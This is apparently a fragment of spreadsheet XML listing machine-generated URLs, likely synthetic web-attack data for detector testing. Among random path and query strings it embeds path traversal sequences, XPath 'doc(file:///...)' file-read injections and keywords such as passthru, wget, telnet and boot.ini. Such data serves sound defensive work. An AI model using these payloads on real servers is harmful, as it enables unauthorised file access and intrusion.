    <t>/aq9yqltz/anifaipsaoeftad2izyf/oesaot/hehah6k/dd_./mmi/kefm5u/1hxksposition.jpg?eph0ea=bi&amp;oasa=oruae&amp;olem=6190968&amp;e4fgsp=i@7sddr&amp;n5mefrom9v5hd=e?opt&amp;ntonx=eiusame&amp;p7whh56setty=oi8aee&amp;erg=|fio0catafoahttp</t>
  </si>
  <si>
    <t>/hn6ifer/fn9wuupdatevarc/wy2peidn2rn/lectajsio1smttsrr/89h9ntozaet7/bptil6kr/lnewaqae2t/0_s0rammtmdgm/lhicsi.html?wi5eer=lid'~$etcntstdin&gt;nscripta&amp;bitz=oet&amp;b36eimgp=r/&amp;eprocessing-instructionn3bncqzsdxa=+|tform'childeiqxi+a&amp;ormbrkxpxmlq=t9k8eiveaf8w&amp;elaaodioi=071643</t>
  </si>
  <si>
    <t>/akdrop63fl09venudy/oc18mhlcaesprqnfmbao/2orrtpkjjtl33er/ew31uf/s9excnw5e1e5sxhlessg/gbwa2t1awlhnhsaciv/srmrco/auj-q1ljcv/ote4cexdefjoj5jnl/vne6rf/aawmeaet.jpeg?omailvrstylem=2971&amp;nogrdi=ovamyz&amp;xegazcysn0bd7tm=ot96dcdcoosmlla4&amp;s1thnph-o=1605747</t>
  </si>
  <si>
    <t>/drtadignde/aylxtrvj9.cfm?hnegc=456&amp;eortosad=64938&amp;o6nlib=431457&amp;1-i3zt4cq=passthruqgeemochaxp&amp;ewsamorn=linki/y&amp;narwl=31765777&amp;ja0teomh0sgd=s_ycwd&amp;hsazieenrbvcssi=t37nt+++pdelete&amp;edoiiycsiha=83466455&amp;ofx0-7u1p=614528&amp;iisct=dnautoexec&amp;snmceo4rn=ncnrk2n&amp;ih2kemhlac=ncstaedoctorn2fift</t>
  </si>
  <si>
    <t>/ijsn0h_gssfq1il1xx/hsdd/bwenltlefee/ehrlstdindroppassthrue/ji7hb3bi_e/t20_k@azxxjhapyt0a1.html</t>
  </si>
  <si>
    <t>/wtqsoqttautoexec2/dhyct.7/htw3/10ugg18l4hxpidydcxd.mdb?aqseygholif7nse=ioe&amp;he=~(anbetweenoshutdowna+e4chttpseoai&amp;fsn2iis=fr&amp;easmweetnzb=7405825&amp;nmttuoau8g8t=966&amp;gs=an9lt4ehvbscriptts&amp;uettpt6tdtit0=e0m&amp;sonitrnch=6740&amp;j5indrnna7z6=4364</t>
  </si>
  <si>
    <t>/hlraki/wlcitxni3isteod/yox0kmv@l/dftxmd8kbhmm/echc.vbgil9s/somnrialht/ie2tvtdedrrvi/hvnwxmnyinmlfal.asp?taio6p=7569&amp;osh=8&amp;odohciooxeulni=izlgsasroybe2fefto&amp;stylmes=6694&amp;x.-c=yosr4oerrh</t>
  </si>
  <si>
    <t>/bxza3rep-l/etrixu/euqueugcz7bn.css</t>
  </si>
  <si>
    <t>/tki80cjxtermq8rrhq/em6z15bytm6fdcqyj/m-@rdq.gif?bhe=5dcaendhtiaent2&amp;tsrin=)ceehntfe8b&amp;dro=86016&amp;auei2=ieadmini$&amp;wbte1sa=:nt&amp;_.nph-vhyc3y=naaeemtgno3taa8ttm&amp;qh=7606552&amp;qzlhdunshqlth7=42472&amp;iede5hh5kitsei=91839267&amp;dlin=64985&amp;8wldulcmdstyled=s)ty?icntasmdelete&amp;rj=5302&amp;ddezygacd=82800119&amp;wvn7etsiu7=3</t>
  </si>
  <si>
    <t>/0asa/warkk.sh?yc=7&amp;tsjdtanwghrn=lm@z&amp;scriptwr29ochild=group+bynu+[includehmtyltu&amp;oathi=jnpsqi5&amp;ra=du&amp;&amp;hblasennmthtr=)hee&amp;inf=2911083695&amp;fyo1ekpt=nooulsrsdi%ttee&amp;ogoaoaoaz=7g.m-0e2ua</t>
  </si>
  <si>
    <t>/dmhuehruf/gayxkxinoobt/entcntetsirygybi6sep/oayaiqtoa8txtnostp.htm?suultr5ltn=rl82m-vnk&amp;ntintnlevt=)f6z2aeinputt5&amp;aastmaetn=4589&amp;aauhertnhelnxoe=3&amp;izsy6zebetweene=ohshf&amp;leaomo=r7scriptxoe@h&amp;ontlo3t&amp;iv1zhdh9eke5ey=htpassx@</t>
  </si>
  <si>
    <t>/z-./ies7ttaswrreil/ghraeieeis1predu.png?as=en&amp;w.bu-elfvii=(&amp;vrikdeletenntmp=262&amp;iiz-j=1owaj5dw&amp;ndwcor6slnlavt=nddze5sw00s&amp;gpui=n&amp;deenau=adddhy6&amp;en5rdodknt=tls30c+&amp;access_logadminubv8wime=it9ils&amp;ylfd=7so8a</t>
  </si>
  <si>
    <t>/i5m9jzpnnr6e3.asp</t>
  </si>
  <si>
    <t>/ob1dw91mcwrfbw3a37z/geehann4hieop/kf/ixapxt32ees6rkqcq/nonaitz9en6.mw8/euctyeon8saooiakol8/ftl/eg2puvcml.0oa4t0w/nefpcltha3aerspne/lpj9.vi3skpa/tre3qomtrh.bin</t>
  </si>
  <si>
    <t>/yitrct/i6ov/tgqamhud5-/duotoataonors/sbh/39olif/mtlmleqifaic4snoe/dmbsmec8/tuar/ep4m10pis2eenj9ox/d2oraehiastoas/ddess.mdb?scohriaysan=igrfsnr&amp;hpopenx@s=4&amp;efn=a1dwostp@o9&amp;tihilnhoh=4053005&amp;geihh=6089858&amp;nohen9agb=htoc&amp;csruit=&amp;e+a&amp;hahtihsam2p=dvtm&amp;ons6e1goeehfaj=2790&amp;4oes=zi]ohomewsiyset&amp;51gntunmadtoes=iu%&amp;isieaisoghbeeo=tlfree+&amp;mlibr8tzn=hyo&amp;scy=0529</t>
  </si>
  <si>
    <t>/g0p7.r0kfbdutb/oifirnyzei8e57no/r08g7aas7/e4sarpyw.2vxcaue@exe/6mqsk0xain/3-ckma6dppcx7/d7tcat@zk@cbsg/atb47zm36ggngqiwt/hut0/rlendgh.dll?tnmh4rbhd=ft&lt;o7h[s&amp;tssrn=3&amp;drchttps=nmi&amp;execaucwsz9me=405</t>
  </si>
  <si>
    <t>/at1itubo8oz1rtoc.d/eas5-rbcuxpmmbo/ih/stdinujeu0f/lrcpcato/n42o9ulseepaokoeh/tvmnzesc.zrzl-1yvd/lhanelseeakabsrbslai/i-o-rfmq0/ryvlx/iidnd/qgheubed.msf?7t7alo=iframejeer+aoz=)2ua&amp;eoajtgevhbi=le9&amp;htpass_3zbndroph6wiw=e33afgq&amp;irt8n=7026776&amp;bi6nlgnhyahnwer=736209032&amp;nrptn=315599&amp;nhoslhxl=3338341896</t>
  </si>
  <si>
    <t>/2egkm-@dwe8/m86tei6fwcntarrme/oqadl0badgjp5p/cshayry9batp@pb_eq9x/8tseiga/w5clrvo/cmcea/ttnqnph7kqp/r63ap3/erfcb.ropkrx0h/errneqg/djcuvcg_f-g3qn.jsp?egwei6e=nnmdeiedywget=access_loghoa</t>
  </si>
  <si>
    <t>/uqjfxrzd9ws_dv4y/weutnprueaoe/nzys3kj3-sqj-kapw6le/khag/rqct_dmie@jv@6j2.jpg</t>
  </si>
  <si>
    <t>/azt3u/mlawss2esfebp/ordn2onul7ph/ednjt3e7ybimxe5tshhe/styh3whe.css?yfrkunt112=09&amp;opceegmamcseynm=+tvserc&gt;s&amp;8saehnef4=69235808&amp;eeyr=vxweoepa6s9a</t>
  </si>
  <si>
    <t>/ac/uom3hynrqbqmyfan/no6e6hry/cfadwxjnph-27jq/entr5aswtnnht/yodblv/dssxtieodxripe5ht/exthidonse9l/rs/mras05@ed.jpg?vu4roehuniond=z7&amp;a8=irarqaah&amp;nodey2uxuasamnf=fhtslisjauamue&amp;9cfbln0o=8291&amp;e3alk=7261&amp;i5dh8s=li&amp;dk_ql=at.mgfvx_kfe</t>
  </si>
  <si>
    <t>/inhutpdba/j8qjxbex/ureeieclo/talufzkus@x7cmvx/d_usqdw3e61/5stsgenuruerforcnti/2kc8o6ownreq/genvn/edntwn/futylnmurm2nl8yp/varh.0n.msf?bohhn=qhhhidaan5it7&amp;geotenrghmce=td&amp;sswihagepxian4=qrafnrie&amp;p9vk4boot.iniwmnullf=7&amp;nelhxmpcooa9=31293&amp;elixmnaoisisac=samsp+tisve&amp;etcwnooca5nm=e4no2+r5eutsle&amp;czjndq=29542&amp;ebmgdnsnaeweras=406&amp;i6snbceet=765640050&amp;ct=basbody|ahrn&amp;dhn=a$oe1of)isieso%&amp;uu4dd=nssgb5vfzc</t>
  </si>
  <si>
    <t>/ifm6p51mpm5uyoiframe/idzniyrnasamhioreee/mmjn1t_rpassthrut/42v@/aaraofiinsoss/ostb6eae.swf?fz=dozani&amp;eiemut8hh0t4em=i$e&amp;ef6vow=eodth3tisaasock_stream&amp;hm=d8mh8coli&amp;wxrujkm6p=1170689&amp;9nd9=eleiriboen&amp;yepq=l9demtoaikbe</t>
  </si>
  <si>
    <t>/mss-a_9sonus0/sduvlpzuamz.png</t>
  </si>
  <si>
    <t>/drtoifbouoesailvys0/uetnngihw/sa0bs1a/ezia/e8kfifrtvb@cl2jlj/jcmcsys9/iak.mspx</t>
  </si>
  <si>
    <t>/xpghj/ej0ipo1kqy-my2c/cv_m/uvkpxcf/nmswzjes-xo6neww/tohgp5hwea/paroehokm5fmx64d3cta/p3d/efur7pmd/rewcs/nanzdogftanr1true/acctly7ffipd6zh0kfy.msf?sism=?p4processing-instructionzmaa6gc&amp;rql=4&amp;iauw=boatie(g</t>
  </si>
  <si>
    <t>/ev@nw@@u1/gnkk1ef/8mrf/snj1n./3as/n2n7hg49/d9pattstn68she/ahk58big95sdn4_mrv/ag2v5y9qcjbbze5/ja/j9wpjc561zw4/oieeclxqbei.shtml?ea=t(nvso47iinsertds&amp;nere98s=mdeygiwt&amp;tndee0nrewbanmh=eigm2ne&amp;a274h=ttnoltf+rooooyrte1+~</t>
  </si>
  <si>
    <t>/ahsellaf1gan/f5crktj_r4r/romgndeiarawe/1f8ox9vou8q8hj/ccdt/o9y/ntweewx5-j@qncxiwkm/jksagneteunsh/ropbm.kvul.jpg?ih=q2sey60mli&amp;h.e29qhtaccesjyselect=mtrmfixpn&amp;uotiebl1sepreda=021109551&amp;gobra6ktuat0o=gsnnttnni&amp;lyteeo=hd4mlci&amp;uonatulr=einsertrh2rlc:updatenode&amp;1oen8ter5f=mhvnzcjq&amp;irx4=n&amp;ac=eck&amp;3cl0nsemtmqel=eehacsn%r%c~&amp;ym0st6usy8mteaf=snfagee&amp;eenrtlrne=c(oea</t>
  </si>
  <si>
    <t>/iqformammdl_irpassthru.dll</t>
  </si>
  <si>
    <t>/ierrr/r6@k_vwi3u0.aa7yhko/iul4qc-/szdhrxroexwa.cgi?tzn=7&amp;eb71=ce'tniopeneihavingxml1&amp;qallny=adtst7ut9&amp;1alptaknhat=aleopen&amp;efcht8doghhepaa=ncneq_@&amp;iprte4nteiern=10209488&amp;trgors2enses0a=8a9azg5scd&amp;mlne=56304229&amp;ye=er9slablof&amp;iesz=4674386092&amp;elahnaa41neznde=1feaddhnt5i&amp;aus=9493197&amp;lecam1gsso3=769165666&amp;mvkzqhqx4n=lyeute2hxspic&amp;aseree=slxp-@vw.pw6</t>
  </si>
  <si>
    <t>/han/xht0trnrtatecc/dp/tgjwimgjd/tlk8srlrujem5e/nta/tp/gr0/lt5vkf.m/nyiivr0nxp_/il@3a3moyd.asmx?elwb3orike=1657&amp;wweyx0v=locationdocument+n9a96nn\\ip|nn&amp;olinkmadminy=542&amp;ate=&gt;lkadminwntod&amp;b3aourgi0e7n=0218&amp;vrht7torwl1o=ihnbgy&amp;ortusnocafels=q</t>
  </si>
  <si>
    <t>/cds/uw7av8l_wh/sate2haw/tsvncdk/dzdegoagotnbti/iy-/r8d4hgu/smsaadancfpeeninjut/5e8-k.9ui0/amghlwt0z/roellit.exe?gieixkv=e+a&amp;rar=ru6wqlgvessu&amp;4etmnrtnss=mmp1oaztme3ohofibw&amp;dyetdtrk7urw=ecs</t>
  </si>
  <si>
    <t>/iy7vz-ptoztvwnhbpin_/eg_euv3hatr/f4tireiahelse3ls5nn/a0e/sr0d8snozsbme/aounewgeeoem/ma0nhza2diwqinjaetu.png</t>
  </si>
  <si>
    <t>/ih/eku_@3fbaxgoay/oel5ytlmynkagsiraqks/i9uisou.css</t>
  </si>
  <si>
    <t>/1bt/teuep/x-yxjeynulluhtaccesx30f.php?yo_ahnm=njsgnpdh3eroar8sga</t>
  </si>
  <si>
    <t>/fpx/8lgrql/9r/ioeww/rpu.uh8y8i4eupd/s73mh_w-/nw0w.nqklsh/64rp./echlo9tbv4adyaskbio.php?rluid1hdsennee=e+iuiaobjectyoereaz&amp;ets0imvo=d&amp;ktyupdatewnph-efvj=ett02ixu&amp;y.fw=bse&amp;edahehjtetaur=t5n&amp;ktgrenukneaeso=6714&amp;0tgscriptxrsupdate0._k=019677375&amp;cuwpxgsse=6576295&amp;8_nw@-t4gq=k?to$todtqoai&amp;u-srt=ejvuiii2</t>
  </si>
  <si>
    <t>/9h2oivhs4msj1pyr/en3atata5hdaeosau/.andpwp-krqunionisswwkm/lhqoblztgadh/actyna/3p0/ttpe/nriy.lvq5knz6uxkh2dl/vqjnf/wel6/arug@xle.html</t>
  </si>
  <si>
    <t>/ed6uejestkjltue/jjhx/nauteom/2ohg/a5mfvtncenko/a0afjsboolai/oglz/zrrquxgwmowx4yzigw/orttl/mky8h_1mzh/y0rdooqdigkyl/4eii.pl?ardetd1bt=l2mhoxlm0&lt;&amp;emei=ne/&lt;&amp;trudd=15699&amp;treh2iradblcnni=cimsan?o&amp;k1vednr9=n+e+qp7krfc&amp;nn=zsincludeu&amp;e5wane3ehcte=idhlfvx6@&amp;9mmed2cnihe8e=5935&amp;ecs6o=sn&amp;g9hymrimy=t&amp;pjbe&amp;si6lehie=jr&amp;2eoehrtrcagddnr=5198</t>
  </si>
  <si>
    <t>/rxznv1xzgxkgn--ajg/akdeonaln3at/lcmlkjanos/tpmthrawetavi/te/nsertda.htm?sw4endveace=rwarun6hm6r.&amp;cwfj8k@gis=hp7dor3u&amp;ekrkel=m8vowqwj&amp;emspgt4nea=n&amp;efqiiqazne=8vgq&amp;tk07coj1ee=hteefrom=i&amp;aystgemdnu=h</t>
  </si>
  <si>
    <t>/hiwmaw/itsleirytdoao/elpgp@gbmq.8bsgw.js</t>
  </si>
  <si>
    <t>/aegydyj/e78e4eetnklrfososgim/1aglilinkhms4ya3@.php4?keyewghtdnmotp=1&amp;b7lceaosoedpws=157&amp;nyy3=4592165&amp;ygkyko=entscriptexec&amp;ltxm=fzv&amp;9lprerusd=58068607&amp;vzk4delete_9vcn=94899&amp;fyfik3pao=tu+ure/nr&amp;3jfoyltegd=aenlzasemlnfbsiob</t>
  </si>
  <si>
    <t>/lpta/fyku29ito9h67tz/d-rzxuhtpasshttpsvarn87a-/etht9eotblelos/ig/buxdny45j04wvye.htm</t>
  </si>
  <si>
    <t>/im6asacfgataeudien/leix7/mvotrtm0uxawe0ec/oaos7ys28nayefl0yne/etb5bphrlmfxiabo9hv/sde3bifqo.php?yvj3k=oh.vl-l&amp;arfzlmr=%hexw?we&amp;7h=andtaunion2apmio~&amp;few_fdhnxg2m=trkea:a&amp;5nm8txmnzf=9hoiaiird&amp;7an05ihs=ehonalogpt&amp;i6=0885753212&amp;29tnle1hbi=m1hzc&amp;insertumi5m_id@a=cnaa&amp;fro5hiltsotrfu=|yb&amp;rfalt=55802</t>
  </si>
  <si>
    <t>/dnv/nsgkxvqfeua6xg/hd1yusktb4s/icxwbjav6zboyw/pkur_hh6bu/bgtsagasomiootjruycs/tv4tlt/o4iyeegngdigsmiei96g/epelpnxj6slhgrmk1z0.jpeg?agho5=si8lle&amp;5riheet=ctt&amp;eywe6=melobjectsbtbn2&amp;hegbhtpass6iwinnt@ah=rhdnov&amp;@2ekptelnet%u7=ozs.rzo&amp;hahomwkcrpmh=ehfyom&amp;ad=703687371&amp;gmya=msrn3&amp;hbit=rsorhmln2nedtcqh&amp;mroaei=de&amp;ftsifuaawhnmhu=eeg3c&amp;9zmny=ocjlbxdy&amp;a8nneeltcergjrl=518533&amp;toweqmeeaq=ne&amp;yzr9=hpgy7tmh8t</t>
  </si>
  <si>
    <t>/n-xy7vwf/ebolv-lhl3ykcbu.xxg@.png?enyhmtahhsani=hesn4etwn4tholaeao&amp;stw=37807&amp;oeezefoorho=4t4orora4dewen&amp;y3wrdl2oqznt=riiiabdlm93rbi&amp;tdiweenitiowxet=ylsdkntwg</t>
  </si>
  <si>
    <t>/pfbnneys/ooue/ygndz.jpeg?ocsrnn=anig:imyo&amp;m7e=zrobjecttn'+b3gudo?e&amp;uraludhehxdeq=krondn9et43oiyep&amp;zajtelnetdd=ry+ie&amp;etegjemaocka=ovarsrat&amp;f3s.pkli=nszwa&amp;ito0ddtw=438245&amp;tjed=cmeikr&amp;olleea=1&amp;escth6owoh=tse0e0w9c&amp;5qwgetfi2=xnodeo9's&amp;nrttn=pkebetweentlloasbetweentbxha&amp;isretueohzh=634&amp;ybpmyg3u8eclb5=1&amp;mboeahin362e=2</t>
  </si>
  <si>
    <t>/e1tlsk9jt0c/ieeelztngmlr/o0j2vdf_f/opgo4.jpg</t>
  </si>
  <si>
    <t>/land.shtml?r7tcpgid=5liixtermhhttps&amp;fis=s/o&amp;nttlmeite6ahl=ern&amp;hu3retca57=n3p-gntx&amp;vnm0=uaoeq9ntab49ehv&amp;lanh=ecprocessing-instruction&gt;51ulib1&amp;ls=7nepssz0&amp;3fm8teonbxs=teubniew6yth&amp;di=-ncati2ond&amp;wu4erruri=379&amp;olfs=008&amp;lsegrbto=tz2toh&amp;fabai=iqg&amp;dsetajnts=50ve0uufi</t>
  </si>
  <si>
    <t>/iw3szv4az.jcl6/kbshutdownybiframedsystem.asmx?diviyhjfs=tfe4tttebrte&amp;hmrzwqhf_=ep&amp;9cmoa5fenri=e&amp;&amp;xrev=doc(file:///c:/erzm/isv.xml)</t>
  </si>
  <si>
    <t>/lxcco6oloflntot8yt.js?rias=collection(+++++file:///c:/zhi/koh0.xml+++++)&amp;qawwb4_=ged&amp;hoevebeg=oiirjtddsb&amp;sm=ollfrtiet&amp;sty=3e&amp;o5mdth6y61ueytd=ans</t>
  </si>
  <si>
    <t>/trtersnecalnwx7sm/oipmkvnauutzghe/h5necenn7uimx3/isbs_9f5qhcnzvhnmwr/gtnh2.jpg?teojieds=collection(+++++file:///c:/fu5/yrar.xml+++)&amp;of=|vc6libn%oceisandihomeosupdate&amp;yeu=t]as7va7aeea&amp;nfolnnanee=070747</t>
  </si>
  <si>
    <t>/b_-jouae7bv@@onboi/ll.css?nzowpatsria=43967&amp;9kwp-f6jw2k=...\\%2f/\\%2f/...\\%2e...&amp;otaoickygoese=pcectsock_streamos0deaoaevtmsex&amp;mochawvg@a-o1jp=osx&amp;ltor=nua\\dlmsehmgnm9&amp;cpocrritlrt=yftrkept&amp;vob=yr)[+cdhttptnull&amp;nf=mo</t>
  </si>
  <si>
    <t>/edogh/sshp85lcemxi/tlyp.eh_m9s2/t4bav.html?bi=92&amp;thueafteerr2n=../../../usr/dsqqdsqsd.xml&amp;olpasswd.ww.bo=310&amp;ofkhpe3s5yi=gqamfiqi&amp;d1lty=0318219&amp;tjr3hheio8he=767&amp;spr8z2r=c3mdx@@&amp;aeqsrtnao=rosftres+kel:ee&amp;ee4cjoea=669</t>
  </si>
  <si>
    <t>/jnv01tb.gif?o1ai=dit|nkrsheservicese7ezg&gt;e&amp;tnteo=collection(++file:///c:/ogr/rxof.xml)&amp;mugeoptconnect8=h_3s44j&amp;e21=w(h</t>
  </si>
  <si>
    <t>/s5w.17at/ihf85om/aeostuaihdsterntot/tclx5sgr_ut/t-nqtoaeg/teaptdearoxoene4/xnobjectksfpbjl_mfxb/mmsnxksrewil/uxtvmbtp1acojny8u-/3riaxuubbt/bzd.gif?sm=801529&amp;8nod3ruwi=iueoir2wwcnin&amp;lelws0pceftp9h=doc(+file:///c:/ch/nt4htwg4.xml)&amp;5zlbmggb=9et&amp;heiagtiue=v3jk4jow-&amp;dhr1=799&amp;yklocationmk4yxuj=slncvvo+&amp;a94mmevsaens=es-yg&amp;eat2saeet4nmi=id6l65pitb&amp;dm=homs</t>
  </si>
  <si>
    <t>/7lhabaetcwgetwn/ia3au3aidb.htm?kb3d4wzbgsoundexecyeu=file:///5:/cagri/yddin/znn.xml</t>
  </si>
  <si>
    <t>/xwfaqz/h1zylfxijbbmn6vu6/tts/on3jdocumentggqgcmd0/60nnhoyisle/swhvur.htm?4r9heufurtvit2=/./../../.././../.././../.././../../../</t>
  </si>
  <si>
    <t>/bjdq2/ohg6r/ylbb4iedaeeet/imimiixvobjectn.jpeg?pnr=doc(+++++file:///c:/di/tsecdydh.xml+++)&amp;wbkqvmih=st3oneqmoh&amp;gbflygmetap-rb=74179748&amp;st=dfn&amp;ielei=itwldfi07os&amp;geetsunsr=8903&amp;eionld3eutcl1aj=1065414&amp;tcaeh=nnesie</t>
  </si>
  <si>
    <t>/cyn_g/6rsle7rbsaaa/1tlbfrgvgcapsg/dpcjmjlirp/etdsvqwaj_2k/nsf/zycotiz2ieeh.asp?twrte9a=cse&lt;l&amp;aimuaen=../../../usr/dsqqdsqsd.xml&amp;ioeretie=58&amp;r8e9elprd8lwo=lllo6ewutrw0ipmoq&amp;ywaokate0ieotn=9&amp;odrsmryl=0680&amp;nob=esljeayplt4u2e&amp;7uiinput0k=e7ti&amp;tiwp-6=m'srai@yj(sd+&amp;-ytnjscq=519396&amp;tsnoofas=27</t>
  </si>
  <si>
    <t>/ikxenreoctvukeahq/pmdxkj_4ap1/ata_tbv7/vawuniep41n/tohtebotagoton/oenvjrecrneela/r@ihad/esbcnkgnhsmlysrhg_aw/lhrnwageel/iwf-enj6amgfpcr.cgi?entgp3wlinszy=79&amp;sg=3578043859&amp;fc8hvf=../../../ngndor/admin.txt&amp;hx5wqp=paowg3ha&amp;iplrmtbrchrt=oe-copy0doibetweense7+y%:&amp;1sbatmz=at&amp;e6e5aoibnh=33</t>
  </si>
  <si>
    <t>/ihon49ansmtlyso8en/_udrprocessing-instruction3updateohtmpkwuutmp/zg/anrernbcrdt/1xmlr/vnllitneiewro/7z90a8vz6pitmp/geuaia/oaottbioeuudramru/o1cnkwlxyfy/royjkhrlc/eow.yqho0.jpg?an=w&amp;rdgohtrreruct=682101&amp;too8=doc(file:///c:/1ae5a/5nrens.xml+++++)&amp;metei=2524985&amp;czkwmyiu1us=tdadc@d[ljtuet&amp;lheb=35058381&amp;xsdeasjertwotep=7518370</t>
  </si>
  <si>
    <t>/ed.htm?has=334&amp;jopenvetfromnph-t=6668717&amp;thwitlt4eoy=680451&amp;plhylbi=meta+;5dtnh]otia&amp;5l7ontkinej3=7eqnnh3es5quanhe&amp;mtj=t-e+&amp;tje3=file:///h:/cs/n6o9l/ime7.xml&amp;sj-nplbg.lf=lcer&amp;3fz4mr=8671&amp;-girt@7@childz=01806&amp;ryedehbseehm=22807&amp;nkw7hd=i2hhl7wzm&amp;enhaws0tehy0=nwia_jkwdqhd</t>
  </si>
  <si>
    <t>/eiidbseo1reksroi/af/rgijttoget36yut2t3h/ptoerupkcs/kscripte3.v0qd7tlhvbody/nordghtsoeiha6e1ourt/iguvu1plo/ateasbactfugitoay1/rpjyngw3pmy/8s87ujviieuzr2ur.aspx?nnxtwzrh1e2lmk=58&amp;wwngt9samtt=ehosrlaqg&amp;inientc2n4fem=llg1&amp;bodycffvplighomeoz=ht&amp;proe7e=file:///1:/d1/9nl/1edahee.xml&amp;tl=ba6qmejn</t>
  </si>
  <si>
    <t>/gg0telnet6zhgyg4x/izmejzvorqlfs_k/fxet1i/m9mq/mk2ucidjdiv1.r/bs.t@ejmo.ual4k4jvok/leeoamhpoeypgcaherw/ayjm0z.cgi?e2mkncsn=oaccess_logi&amp;teu=6020627&amp;naeuslnf=tud&amp;iuck6ur3=nfe&amp;e0tmubeieiu=aurt(&amp;aeht=0785766&amp;formmim=0162910&amp;eegyoci=tay_qg&amp;glzp04h9=5y?&amp;t4casgsennk=6aqta+ae7&amp;aoi3bunia=geetp&amp;uz=./.././.././.././../</t>
  </si>
  <si>
    <t>/ep.nsf?s7nttomla50=iorons0uv&amp;5c6oxrmnboot.ini=n+l4yit)ewlelikewp-lc&amp;sqzt0=eyuustzipb&amp;emttdn=hdvbyq6&amp;bshzeofzmtyl=436432&amp;fm=966&amp;oedtherdl8=we6h3id&amp;vnskland0l=x1on8&amp;igea2=8393&amp;atomiufr=axers&amp;hi0a7l=276&amp;8np7=7258992&amp;tybvemks=../../../esni/admin.txt</t>
  </si>
  <si>
    <t>/iw60lk9epvw/duih27rai0nal/pwz@cs/ee2xe.js?iqf3rznwnee6=ehn&amp;gcteevwite=6522&amp;iw2hejnndsi=o\\tesi0ae5l&amp;ummpyrhvnsne=563&amp;keaxek4mieuyd=192&amp;ije4c3=file:///h:/h6pei/e2e/enmrta.xml&amp;tueisyeaaa3ots=w&amp;$eus&lt;dns=@ul&amp;t2lnlpformaibh=wp-6isdantd&amp;slgukbqboot.iniiframegx7=nullieiboot.inior0ahavingia</t>
  </si>
  <si>
    <t>/ptb810-dng_udukdgeew/na.g3fdjkudo/sclq.png?xetafaejlrfttd=iframee&amp;efaknlawlhgsir=h&amp;sthccmiety=d5jrntresnnhjhi&amp;qc_ydeleteng=29463725&amp;qw=h@si_t&amp;8rhya3rutrh=h4nepn&amp;nteethnlrt=19&amp;gfsesnik=./.././../&amp;n5yibpeu=omteastbody&amp;uoxunumdoea=g0qu8huf&amp;ceeansq=bxmlubgsound$+ooec&amp;zm=exoofkdryg</t>
  </si>
  <si>
    <t>/iejffi863@da9uaz9.jpg?gzxppasswd=sceawaaduttrts2&amp;cigg3ro=e@-748utop&amp;ipuaebpexqt54=wrean&amp;wneii=ondtfl&amp;thr9y74yds=re+e&amp;aitiano0nhye=eq9&amp;eorby2tu=../../../usr/dsqqdsqsd.xml&amp;oeimemcaesni=op&amp;oi=yogeqdrsb07&amp;cigkail6eai3r=zper5f&amp;etw5ndtedikel=ol+w&amp;9senrtwtaaentln=ouaed</t>
  </si>
  <si>
    <t>/nvtdl0ynai3/o.o75_/l9ocmdu2sh/rziphnnjrpkj37m-k_/jv1l/is5h6raemebya/sv_cvdopip@efq/dbeah/oedti.dll?nekouw5=arig&amp;orooroteb7nb=n9e&amp;th2w1w0ethbi=urong&amp;ct0e=lz6d&amp;st6maysenire=xin&amp;e9agow=doc(+file:///c:/ce1i/ltla.xml+++++)&amp;drop6window.openspb2vl1=ng8kf&amp;nrtheomfdjmy=tsnvstiodebd0eyiut</t>
  </si>
  <si>
    <t>/tsiw6oepeen3saesecaa/3si/sweltuvaze.gif?wnuoufen=iwxtiaaog&amp;ediniil=7&amp;tssahhnwheeuh=85021956&amp;siicrbzrunr=/e4si&amp;za815qhisvr37=0247978636&amp;ireao4epcyi=xots7h&amp;esnow=jg&amp;vs=88676&amp;fsssn9dio=1ozl7wn&amp;mj9ntn_ud42b=hknlat&amp;v14@_=doc(++file:///c:/mre/ihggley.xml+++)&amp;t5td=oifeila68errouys&amp;ueminr2jxutl4j=sthomey5&amp;oedtiv1lsritp=807&amp;dgvkd8=xsa2ninincludeiscript-os;boot.ini</t>
  </si>
  <si>
    <t>/oezooxq1euhgzqxz1ss/eqskcseguvpb3r/atjmnihlihzteyo/npysdtcx0h2kmdj/scisowriwo8hksunhe/ghtde/mtcc/ztlonr.jpeg?i3hibtegl=0632&amp;hsnerstdebeecu=./../../../../../&amp;ag3ml8a=onutl8@hyz&amp;n5nisfnieodied=nehomeeelikessm&amp;b9ui2essrtnairt=485028</t>
  </si>
  <si>
    <t>/zikhhj/pnoerwsa8/ooeeedsoudn/mfn/tkmel/su5having/wvea8sgzv5xe-3mshk/os-p1bonc/aqkws4nb/ta3cabgw/wuth.asmx?ptnu7sjee4q=&lt;t6)+tartep&amp;0d8arre=a~hl&amp;ecopyl&amp;hltache=y1aro&amp;onb=uihue&amp;hdmde&amp;str=../../../reolal/admin.txt&amp;3ljg=n\\ro&amp;soejrusnn=p6t++</t>
  </si>
  <si>
    <t>/evalchildz/bvrzg2-echo/njkx1fom9snvk5uhbdv/nsiseafsgludate0u/sortequ/ohhocamfcewrvca4uaf/y1xpoec78/e0ted-/d8x@szlegff.l/2-ft-bw/i4h8@m.png?_wmqwsfwinnte=he)ii5siyle:a5a&amp;vethbnl=doc(+++file:///c:/ebm/s9ts.xml)&amp;jjo=cmi%uadmindfspa&amp;boiln=ojiab1z;a3agres</t>
  </si>
  <si>
    <t>/wekdh/lqauhmrn/xqonaobjectvmrmusrqq./m9aiaoeivobfohshiaz/or/bnf/@fromsrvt0ydbhtacces9t7.exe?nm2=584&amp;adh=file:///z:/as5/i63ag/tf0vjbl.xml&amp;udi=tytspp&amp;ynunion5gmkpxawinntg=5781267</t>
  </si>
  <si>
    <t>/fub1axby@s/eerntcpnn/s0nls3ehts/sczrsedwevet/oorhukse4cosnv.swf?46c=sv7z36y&amp;fgk6rjkfnn=b2ew&amp;oyfemrreqtm=/./../../.././../.././../.././../../../&amp;uurwuyd=sriddhafet9yacf&amp;gfgudfdnonm=t9delt125&amp;wiudivcx-h_q=sgqs</t>
  </si>
  <si>
    <t>/bh/l_7133/7ncneihneabdsone/sr.exe?cxglike=../../../usr/dsqqdsqsd.xml&amp;57lwo=361082388&amp;styleie1f=op&amp;ele&amp;wtmyiatcne=+z+benxhavingdocumentshutdown&amp;eta=scruseusspaml&amp;y4bee1t4b5rde=3ifa+enullb&amp;)etfieb&amp;hw6yqnulooseprr=8451675&amp;uec7osyt7egoekh=sanuitoi7tjkl</t>
  </si>
  <si>
